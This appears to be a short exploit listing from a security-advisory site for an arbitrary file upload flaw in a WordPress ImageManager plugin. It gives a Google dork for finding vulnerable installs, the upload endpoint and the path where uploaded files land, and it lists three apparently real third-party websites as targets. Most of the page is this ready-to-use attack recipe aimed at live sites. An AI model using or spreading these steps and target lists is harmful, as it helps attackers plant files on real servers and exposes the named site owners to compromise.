WordPress Plugins ImageManager- Arbitrary File Upload

2017.11.05
Credit: zinofile
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================ # Exploit Title: WordPress Plugins ImageManager- Arbitrary File Upload # Date: 04/11/017 # Exploit Author: j!h4dDZ # Tested on: Windows 7 ============================================================================ 1)---------- Search target with Google Dorking----------------------------- inurl:wp-content/plugins/ImageManager/manager.php Index of wp-content/plugins/ImageManager/manager.php --------------------------------------------------------------------------- 2)--------------------Exploit the websites--------------------------------- -----------------------File Upload----------------------------------------- (PoC) http://localhost/wp-content/plugins/ImageManager/manager.php ---------------------------------------------------------------- http://www.lesnap.com/wp-content/plugins/ImageManager/manager.php http://www.magicrelationship.net/blog/wp-content/plugins/ImageManager/manager.php http://www.trejosolutions.com/blog/wp-content/plugins/ImageManager/manager.php ------------------------------------------------------------------------------ 3) --------------------------Location File:---------------------------------- http://localhost/wp-content/uploads/.thumbs/.FILE.jpg ------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top